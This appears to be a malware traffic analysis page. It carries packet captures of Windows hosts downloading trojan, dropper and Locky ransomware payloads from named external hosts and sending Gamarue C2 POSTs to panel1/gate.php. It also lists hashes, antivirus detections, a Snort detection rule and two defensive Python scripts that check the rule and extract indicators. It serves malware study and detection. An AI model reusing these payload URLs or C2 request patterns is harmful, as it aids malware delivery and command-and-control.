
@getBootstrapCDN TWITTER Malware Trojan Downloader Click Fraud PCAP File Download Traffic Sample batdongsantaynambo.com.vn

2019-05-29 22:03:15.716964 IP 10.1.10.162.49185 > 103.221.223.17.80: Flags [P.], seq 319437355:319437820, ack 122938386, win 16425, length 465: HTTP: GET /wp-content/themes/willgroup/inc/acf/as HTTP/1.1
GET /wp-content/themes/willgroup/inc/acf/as HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: batdongsantaynambo.com.vn
Connection: Keep-Alive

2019-05-29 22:03:16.670058 IP 103.221.223.17.80 > 10.1.10.162.49185: Flags [P.], seq 7301:8643, ack 465, win 22, length 1342: HTTP
2019-05-29 22:03:16.765568 IP 10.1.10.162.49197 > 204.237.142.161.80: Flags [P.], seq 3885137682:3885138158, ack 3673702138, win 16425, length 476: HTTP: GET /button/st_insights.js?publisher=4d48b7c5-0ae3-43d4-bfbe-3ff8c17a8ae6&product=simpleshare HTTP/1.1
GET /button/st_insights.js?publisher=4d48b7c5-0ae3-43d4-bfbe-3ff8c17a8ae6&product=simpleshare HTTP/1.1
Accept: */*
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: w.sharethis.com
Connection: Keep-Alive

2019-05-29 22:03:16.791424 IP 209.197.3.15.80 > 10.1.10.162.49196: Flags [P.], seq 4828:5890, ack 449, win 60, length 1062: HTTP
[gzip-compressed response body segment; binary, not reproduced]
2019-05-29 22:03:16.793379 IP 209.197.3.15.80 > 10.1.10.162.49196: Flags [P.], seq 1:448, ack 449, win 60, length 447: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Thu, 30 May 2019 02:03:16 GMT
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1544639719"
Content-Encoding: gzip
Content-Length: 5442
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 12 Dec 2018 18:35:19 GMT
X-Hello-Human: Say hello back! @getBootstrapCDN on Twitter

2019-05-29 22:03:17.300171 IP 10.1.10.162.49186 > 103.221.223.17.80: Flags [P.], seq 456:903, ack 5552, win 16425, length 447: HTTP: GET /wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1
GET /wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1
Accept: */*
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: batdongsantaynambo.com.vn
Connection: Keep-Alive

2019-05-29 22:03:17.305502 IP 10.1.10.162.49196 > 209.197.3.15.80: Flags [P.], seq 449:894, ack 5890, win 16425, length 445: HTTP: GET /font-awesome/4.3.0/fonts/fontawesome-webfont.eot? HTTP/1.1
GET /font-awesome/4.3.0/fonts/fontawesome-webfont.eot? HTTP/1.1
Accept: */*
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: maxcdn.bootstrapcdn.com
Connection: Keep-Alive

2019-05-29 22:03:20.996939 IP 10.1.10.162.49227 > 103.221.223.17.443: Flags [P.], seq 469823780:469823918, ack 3162838577, win 16425, length 138
[TLS payload from the client, 138 bytes; the server name batdongsantaynambo.com.vn is readable in the clear]
2019-05-29 22:03:21.000153 IP 10.1.10.162.49226 > 103.221.223.17.443: Flags [P.], seq 1306475388:1306475526, ack 1356580027, win 16425, length 138
[TLS payload from the client, 138 bytes; the server name batdongsantaynambo.com.vn is readable in the clear]
2019-05-29 22:03:21.267277 IP 10.1.10.162.49239 > 104.76.198.161.443: Flags [P.], seq 1456137481:1456137622, ack 2445346460, win 16425, length 141
[TLS payload from the client, 141 bytes; the server name c.sharethis.mgr.consensu.org is readable in the clear]
2019-05-29 22:03:21.286768 IP 104.76.198.161.443 > 10.1.10.162.49239: Flags [P.], seq 2921:3746, ack 141, win 237, length 825
[TLS payload from the server, 825 bytes; binary, not reproduced apart from two readable time values, 20190529032056Z and 20190605023556Z]
2019-05-29 22:03:21.305611 IP 10.1.10.162.49239 > 104.76.198.161.443: Flags [P.], seq 141:275, ack 3746, win 16425, length 134
[TLS payload from the client, 134 bytes; binary, not reproduced]
2019-05-29 22:03:21.321761 IP 104.76.198.161.443 > 10.1.10.162.49239: Flags [P.], seq 3746:3805, ack 275, win 245, length 59
[TLS payload from the server, 59 bytes; binary, not reproduced]
2019-05-29 22:03:21.329715 IP 103.221.223.17.443 > 10.1.10.162.49225: Flags [P.], seq 8:430, ack 138, win 22, length 422
400 Bad Request

HTTPS is required

This is an SSL protected page, please use the HTTPS scheme instead of the plain HTTP scheme to access this URL.

Hint: The URL should starts with https://


Powered By LiteSpeed Web Server

http://www.litespeedtech.com

2019-05-29 22:04:14.347717 IP 10.1.10.162.49279 > 198.27.80.143.80: Flags [P.], seq 2027903908:2027904329, ack 3692538470, win 16425, length 421: HTTP: GET /stats/e.php?4214393&@Ab&@R95733&@w HTTP/1.1
GET /stats/e.php?4214393&@Ab&@R95733&@w HTTP/1.1
Accept: */*
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: s4.histats.com
Connection: Keep-Alive

PCAP Malware Traffic Sample Download Snort Rule Win.Trojan.Gamarue variant POST /panel1/gate.php

51 engines detected this file
SHA-256 3bf071be282d16696584af13dc38e1c730f127f1b49504408676225d42874e1e
File name AU.EXE
File size 572.5 KB
Last analysis 2017-11-29 21:23:27 UTC

Ad-Aware: Trojan.Crypt.Agent.BF
AegisLab: Gen.Variant.Razy!c
AhnLab-V3: Trojan/Win32.Locky.C2242537
ALYac: Trojan.Crypt.Agent.BF
Antiy-AVL: Trojan/Win32.TSGeneric
Arcabit: Trojan.Crypt.Agent.BF
Avast: Win32:Malware-gen
AVG: Win32:Malware-gen
Avira: TR/Crypt.Xpack.binkq
AVware: Trojan.Win32.Generic!BT
Baidu: Win32.Trojan.WisdomEyes.16070401.9500.9999
BitDefender: Trojan.Crypt.Agent.BF
CAT-QuickHeal: TrojanSpy.SpyEyes
Comodo: Backdoor.Win32.Poison.FYRG

References:

https://www.hybrid-analysis.com/sample/3bf071be282d16696584af13dc38e1c730f127f1b49504408676225d42874e1e?environmentId=100

https://www.virustotal.com/#/file/3bf071be282d16696584af13dc38e1c730f127f1b49504408676225d42874e1e/detection

Snort Rule:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.Gamarue variant outbound connection"; flow:to_server,established; content:"POST"; http_method; content:"panel1/gate.php"; content:" HTTP/1.1|0D 0A|Cache-Control: no-cache|0D 0A|Connection|3A|"; fast_pattern:only; content:"+"; depth:15; http_client_body; metadata:impact_flag red, policy security-ips drop, ruleset community, service http; sid:1234; rev:1;)

Caveat: the gate.php POST captured below is HTTP/1.0 and carries no Cache-Control header, so the " HTTP/1.1|0D 0A|Cache-Control: no-cache|0D 0A|Connection|3A|" content match (which is also the rule's fast_pattern) cannot occur in that request, and the rule as printed would not alert on it. Only the POST and panel1/gate.php clauses are satisfied by the traffic shown.

2017-11-29 19:34:59.673041 IP 192.168.1.102.50951 > 198.54.116.113.80: Flags [P.], seq 3095874245:3095874726, ack 2614075121, win 260, length 481: HTTP: GET /au.exe HTTP/1.1
GET /au.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: evaroma.zone
Connection: Keep-Alive

2017-11-29 19:35:06.844873 IP 192.168.1.102.50959 > 198.54.116.113.80: Flags [P.], seq 3400751766:3400751989, ack 361817033, win 260, length 223: HTTP: POST /panel1/gate.php HTTP/1.0
POST /panel1/gate.php HTTP/1.0
Host: evaroma.zone
Connection: close
Content-Length: 80
Accept-Language: en-US
Content-Type: image/jpeg

[80-byte binary body, not reproduced]
2017-11-29 19:35:08.535037 IP 192.168.1.102.50960 > 198.54.116.113.80: Flags [P.], seq 85791915:85793375, ack 2118066358, win 260, length 1460: HTTP: POST /panel1/gate.php HTTP/1.0
POST /panel1/gate.php HTTP/1.0
Host: evaroma.zone
Connection: close
Content-Length: 14075
Accept-Language: en-US
Content-Type: image/jpeg

[binary body; this segment carries 1460 of the declared 14075 bytes, not reproduced]
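One check worth making before deploying the rule above against this sample: the gate.php POST in the capture is HTTP/1.0, has no Cache-Control header, and its header order is Host, Connection, Content-Length, Accept-Language, Content-Type. The rule's third content match (" HTTP/1.1|0D 0A|Cache-Control: no-cache|0D 0A|Connection|3A|", also its fast_pattern) therefore cannot appear in that request and the rule would not alert on it as written. The script below is an added example, not from the page or from the Snort ruleset: it rebuilds the request from the headers shown in the 19:35:06 packet, with a constructed 80-byte body because the real body is binary and only rendered as dots above, and evaluates each content clause the way Snort 2 reads them (a content match without an http_ modifier searches the whole payload), so the failing clause is explicit. A second, constructed request shows the shape that does satisfy every clause.

```python
"""Evaluate the Gamarue gate.php Snort rule's content clauses against the captured POST.

Added example, not from the page or the Snort ruleset. The request is rebuilt
from the headers shown in the 19:35:06 capture; its 80-byte body is constructed,
because the real body is binary and only rendered as '.' text on the page.
"""
from typing import Dict, NamedTuple


class HttpRequest(NamedTuple):
    method: bytes
    uri: bytes
    version: bytes
    headers: Dict[bytes, bytes]
    body: bytes
    raw: bytes


def parse_request(raw: bytes) -> HttpRequest:
    """Split a raw HTTP/1.x request into request line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, uri, version = lines[0].split(b" ", 2)
    headers: Dict[bytes, bytes] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, uri, version, headers, body, raw)


# Rebuilt from the capture: POST /panel1/gate.php HTTP/1.0 with Content-Length 80.
CAPTURED_POST = (
    b"POST /panel1/gate.php HTTP/1.0\r\n"
    b"Host: evaroma.zone\r\n"
    b"Connection: close\r\n"
    b"Content-Length: 80\r\n"
    b"Accept-Language: en-US\r\n"
    b"Content-Type: image/jpeg\r\n"
    b"\r\n"
    + bytes(0x80 + i for i in range(80))   # constructed opaque body; contains no '+' byte
)

# Constructed request shaped the way the rule expects; nothing like it is in the capture.
RULE_SHAPED_POST = (
    b"POST /panel1/gate.php HTTP/1.1\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Host: evaroma.zone\r\n"
    b"Content-Length: 20\r\n"
    b"\r\n"
    b"+" + b"A" * 19
)


def gamarue_rule_clauses(req: HttpRequest) -> Dict[str, bool]:
    """Evaluate each content match of the rule; 'alert' is true only when all of them hold."""
    clauses = {
        # content:"POST"; http_method;
        "method_post": req.method == b"POST",
        # content:"panel1/gate.php";  (no http_uri modifier: searched in the whole payload)
        "gate_php": b"panel1/gate.php" in req.raw,
        # content:" HTTP/1.1|0D 0A|Cache-Control: no-cache|0D 0A|Connection|3A|"; fast_pattern:only;
        "http11_nocache": b" HTTP/1.1\r\nCache-Control: no-cache\r\nConnection:" in req.raw,
        # content:"+"; depth:15; http_client_body;
        "plus_in_body": b"+" in req.body[:15],
    }
    clauses["alert"] = all(clauses.values())
    return clauses


if __name__ == "__main__":
    for label, raw in (("captured", CAPTURED_POST), ("rule-shaped", RULE_SHAPED_POST)):
        result = gamarue_rule_clauses(parse_request(raw))
        failing = [k for k, v in result.items() if k != "alert" and not v]
        print(label, "alert:", result["alert"], "failing clauses:", failing)
```

Because Snort picks the longest or explicitly marked content as the fast_pattern, a request that lacks the " HTTP/1.1\r\nCache-Control" string never even reaches the other clauses; a variant of this rule for the traffic above would have to key on the URI and the body instead of on that header sequence.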

Malware Trojan Downloader Dropper cubeupload.com PCAP file download traffic analysis

FILE 1

43 engines detected this file
SHA-256 b069e7d29889bcdcc61e7936ad4800d2563c8618135f40c50e4dbcdc9314f505
File name gfD4vo.jpg
File size 522.61 KB
Last analysis 2017-09-25 22:14:16 UTC

FILE 2 – Dropper

23 engines detected this file
SHA-256 214325a508b6354286f0ba47afdf998ea8c5b87012d6fac08ec0e7a996ac1999
File name 2602033098198832.exe
File size 266.49 KB
Last analysis 2017-09-25 22:34:21 UTC
Community score -11

2017-09-25 16:39:29.774994 IP 192.168.1.102.61160 > 75.75.75.75.53: 16676+ A? i.cubeupload.com. (34)
2017-09-25 16:39:29.812702 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [S], seq 1274466961, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-09-25 16:39:29.934339 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [.], ack 217614345, win 256, length 0
2017-09-25 16:39:30.010343 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [P.], seq 0:489, ack 1, win 256, length 489: HTTP: GET /gfD4vo.jpg HTTP/1.1
GET /gfD4vo.jpg HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: i.cubeupload.com
Connection: Keep-Alive

2017-09-25 16:39:30.748418 IP 192.168.1.102.56858 > 192.35.177.64.80: Flags [P.], seq 0:139, ack 1, win 256, length 139: HTTP: GET /roots/dstrootcax3.p7c HTTP/1.1
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

2017-09-25 16:39:30.893843 IP 192.168.1.102.56858 > 192.35.177.64.80: Flags [.], ack 1219, win 251, length 0
2017-09-25 16:39:30.924425 IP 192.168.1.102.61163 > 75.75.75.75.53: 19539+ A? isrg.trustid.ocsp.identrust.com. (49)
2017-09-25 16:39:30.942900 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [S], seq 1854319918, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-09-25 16:39:31.041398 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [.], ack 2211464567, win 256, length 0
2017-09-25 16:39:31.042271 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [P.], seq 0:247, ack 1, win 256, length 247: HTTP: GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: isrg.trustid.ocsp.identrust.com

2017-09-25 16:39:31.187180 IP 192.168.1.102.61164 > 75.75.75.75.53: 10447+ A? ocsp.int-x3.letsencrypt.org. (45)
2017-09-25 16:39:31.277686 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [P.], seq 295:812, ack 3052, win 256, length 517
[TLS payload from the client, 517 bytes; binary, not reproduced]
2017-09-25 16:39:31.393111 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 5972, win 256, length 0
2017-09-25 16:39:31.394922 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 8892, win 256, length 0
2017-09-25 16:39:31.395511 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 11812, win 256, length 0
2017-09-25 16:39:31.396583 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 14732, win 256, length 0
2017-09-25 16:39:31.397200 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 17652, win 256, length 0
2017-09-25 16:39:31.508500 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 20572, win 256, length 0
2017-09-25 16:39:31.509234 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 23492, win 256, length 0

2017-09-25 16:39:48.032574 IP 192.168.1.102.61165 > 75.75.75.75.53: 52627+ A? drazalier.net. (31)
2017-09-25 16:39:48.181862 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [S], seq 436295889, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-09-25 16:39:48.293504 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [.], ack 3080210756, win 256, length 0
2017-09-25 16:39:48.300187 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [P.], seq 0:499, ack 1, win 256, length 499: HTTP: GET /PO/2602033098198832.exe HTTP/1.1
GET /PO/2602033098198832.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: drazalier.net
Connection: Keep-Alive

Bor.uz Locky Ransomware Malware NO C2 Traffic Analysis PCAP file download

24 engines detected this file
SHA-256 8feb981439774342fbe7c7a25c21d9cbae58f4cc13feb0ebf3657a85f2142158
File name YTkjdJH7w1.exe
File size 591 KB
Last analysis 2017-09-25 15:50:03 UTC

AegisLab: Ransom.Cerber.Smaly0!c
Avast: FileRepMalware
AVG: FileRepMalware
Baidu: Win32.Trojan.WisdomEyes.16070401.9500.9999
CrowdStrike Falcon: malicious_confidence_100% (W)
Cylance: Unsafe

2017-09-25 16:50:29.002420 IP 192.168.1.102.57680 > 75.75.75.75.53: 45408+ A? bor.uz. (24)
2017-09-25 16:50:29.529203 IP 192.168.1.102.56893 > 62.209.133.18.80: Flags [S], seq 2670765003, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-09-25 16:50:29.719862 IP 192.168.1.102.56893 > 62.209.133.18.80: Flags [.], ack 1966844122, win 256, length 0
2017-09-25 16:50:29.731330 IP 192.168.1.102.56893 > 62.209.133.18.80: Flags [P.], seq 0:479, ack 1, win 256, length 479: HTTP: GET /YTkjdJH7w1 HTTP/1.1
GET /YTkjdJH7w1 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: bor.uz
Connection: Keep-Alive

2017-09-25 16:50:32.505137 IP 192.168.1.102.56894 > 62.209.133.18.80: Flags [P.], seq 0:268, ack 1, win 256, length 268: HTTP: GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Host: bor.uz
Connection: Keep-Alive

======================================

BINARY STRINGS

++++++++++++++++++++++++++++++++++++++

This program cannot be run in DOS mode.
.text
`.rdata
@.data
.rsrc
=o)A
GGWPP
Proc
essMh@)A
hVirt
hvQ3r_Q
DSDS
CreateDesktopW
IsDialogMessageW
IsCharUpperA
LoadIconA
LoadMenuW
PostMessageA
LoadStringW
LoadCursorA
DrawStateW
MessageBoxA
GetClassLongA
DispatchMessageW
GetPropA
user32.dll
LeaveCriticalSection
GetModuleHandleW
GetFileAttributesW
FindNextFileA
GetConsoleAliasW
GetCurrentThread
SearchPathW
GetStringTypeA
GetProcAddress
GetExpandedNameW
GetLogicalDriveStringsA
GetProfileSectionA
GetCurrentProcess
LoadLibraryA
WaitNamedPipeA
GetTempPathW
WaitForSingleObject
GetModuleFileNameA
IsBadReadPtr
kernel32.dll

NEW LOCKY RANSOMWARE VARIANT g46mbrrzpfszonuk.onion NO C2 PCAP file download traffic analysis

49 engines detected this file
SHA-256 ce48b278f8b823c25b222a33027248299bff3cdc2a6bdb0fdceecb0922dd790a
File name jhdsgvc74
File size 653 KB
Last analysis 2017-09-25 08:23:44 UTC
Community score -78

ESET-NOD32: Win32/Filecoder.Locky.L
F-Secure: Trojan.RanSerKD.12397146
Fortinet: W32/Locky.FWSD!tr.ransom
GData: Trojan.RanSerKD.12397146
Ikarus: Trojan.Win32.Filecoder
K7AntiVirus: Trojan ( 0051497b1 )
K7GW: Trojan ( 0051497b1 )
Kaspersky: Trojan-Ransom.Win32.Locky.ztt

2017-09-25 17:50:32.217002 IP 192.168.1.102.58790 > 75.75.75.75.53: 46557+ A? ar-inversiones.com. (36)
2017-09-25 17:50:32.397644 IP 192.168.1.102.57127 > 37.247.122.52.80: Flags [S], seq 2979498304, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-09-25 17:50:32.546454 IP 192.168.1.102.57127 > 37.247.122.52.80: Flags [.], ack 2169675136, win 256, length 0
2017-09-25 17:50:32.556435 IP 192.168.1.102.57127 > 37.247.122.52.80: Flags [P.], seq 0:490, ack 1, win 256, length 490: HTTP: GET /jhdsgvc74 HTTP/1.1
GET /jhdsgvc74 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: ar-inversiones.com/jhdsgvc74
Connection: Keep-Alive

2017-09-25 17:52:34.606370 IP 192.168.1.102.50739 > 75.75.75.75.53: 28660+ A? lordmartins.com. (33)

2017-09-25 17:53:19.760276 IP 192.168.1.102.64353 > 75.75.75.75.53: 11634+ A? g46mbrrzpfszonuk.onion. (40)
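All five captures on this page are tcpdump -A text: a packet summary line, then the payload with non-printable bytes rendered as dots, then the HTTP headers when the payload is HTTP. The indicators worth pulling out of them are the names resolved (the A? queries), the Host and URI of each request, the Referer chain that ties the third-party requests in the first capture back to the landing page on batdongsantaynambo.com.vn, and oddities such as the Host: ar-inversiones.com/jhdsgvc74 header in the last capture, which carries a path that no browser would place in a Host header. The code below is an added example, not part of the original page: a small parser for that text format that extracts those indicators. Its input is constructed from lines shown in the captures above, with some headers abridged, and it skips the dot-rendered byte lines because nothing is recoverable from them.

```python
"""Extract HTTP and DNS indicators from tcpdump -A text such as the captures on this page.

Added example, not part of the original page. Raw byte lines (tcpdump prints
non-printable bytes as '.') are skipped: nothing is recoverable from them, and
every indicator of interest sits in the summary line or the HTTP headers.
"""
import re
from typing import Dict, List, Optional

from urllib.parse import urlsplit

# Constructed from lines shown in the captures above; some headers abridged.
SAMPLE_DUMP = """\
2019-05-29 22:03:15.716964 IP 10.1.10.162.49185 > 103.221.223.17.80: Flags [P.], seq 319437355:319437820, ack 122938386, win 16425, length 465: HTTP: GET /wp-content/themes/willgroup/inc/acf/as HTTP/1.1
E.....@.....
GET /wp-content/themes/willgroup/inc/acf/as HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)
Host: batdongsantaynambo.com.vn
Connection: Keep-Alive

2019-05-29 22:04:14.347717 IP 10.1.10.162.49279 > 198.27.80.143.80: Flags [P.], seq 2027903908:2027904329, ack 3692538470, win 16425, length 421: HTTP: GET /stats/e.php?4214393&@Ab&@R95733&@w HTTP/1.1
E.....@.....
GET /stats/e.php?4214393&@Ab&@R95733&@w HTTP/1.1
Accept: */*
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Host: s4.histats.com
Connection: Keep-Alive

2017-09-25 16:39:29.774994 IP 192.168.1.102.61160 > 75.75.75.75.53: 16676+ A? i.cubeupload.com. (34)
E..>.......2...fKKKK...5.*z.A$...........i
2017-09-25 17:50:32.556435 IP 192.168.1.102.57127 > 37.247.122.52.80: Flags [P.], seq 0:490, ack 1, win 256, length 490: HTTP: GET /jhdsgvc74 HTTP/1.1
E...M7@...Iu...f%.z4.'.P...A.R..P...0C..GET /jhdsgvc74 HTTP/1.1
Accept: */*
Host: ar-inversiones.com/jhdsgvc74
Connection: Keep-Alive
"""

SUMMARY = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): (?P<rest>.*)$"
)
DNS_QUERY = re.compile(r" A\? (?P<name>\S+)\. \(\d+\)$")
HTTP_REQ = re.compile(r"HTTP: (?P<method>GET|POST) (?P<uri>\S+) HTTP/1\.[01]$")
HEADER = re.compile(r"^(?P<name>[A-Za-z][A-Za-z0-9-]*): (?P<value>.*)$")


def parse_dump(text: str) -> List[Dict]:
    """Return one record per packet summary line; HTTP records collect the header lines that follow."""
    records: List[Dict] = []
    current: Optional[Dict] = None
    for line in text.splitlines():
        m = SUMMARY.match(line)
        if m:
            current = {k: m.group(k) for k in ("ts", "src", "dst", "dport")}
            current["kind"] = "other"
            rest = m.group("rest")
            dns = DNS_QUERY.search(rest)
            http = HTTP_REQ.search(rest)
            if dns:
                current.update(kind="dns", name=dns.group("name"))
            elif http:
                current.update(kind="http", method=http.group("method"), uri=http.group("uri"), headers={})
            records.append(current)
            continue
        if current is not None and current["kind"] == "http":
            h = HEADER.match(line)          # dot-rendered byte lines never match this shape
            if h:
                current["headers"][h.group("name").lower()] = h.group("value")
    return records


def indicators(records: List[Dict]) -> Dict[str, list]:
    """Summarise names resolved, (host, uri) pairs, third-party loads and malformed Host headers."""
    out: Dict[str, list] = {"dns": [], "urls": [], "third_party": [], "odd_host": []}
    for r in records:
        if r["kind"] == "dns":
            out["dns"].append(r["name"])
        elif r["kind"] == "http":
            host = r["headers"].get("host", r["dst"])
            out["urls"].append((host, r["uri"]))
            if "/" in host:                 # a Host header carrying a path is not browser behaviour
                out["odd_host"].append(host)
            referer = r["headers"].get("referer")
            if referer and urlsplit(referer).hostname != host:
                out["third_party"].append((host, referer))   # loaded on behalf of another site
    return out


if __name__ == "__main__":
    for key, values in indicators(parse_dump(SAMPLE_DUMP)).items():
        print(key, values)
```

Run against a full dump rather than the abridged sample, the third_party list reproduces the loading chain of the first capture (sharethis, bootstrapcdn and histats all carrying the landing-page Referer), and the odd_host list flags the malformed Host header of the last capture, which is a better fingerprint of the downloader's HTTP client than the browser-like User-Agent it sends.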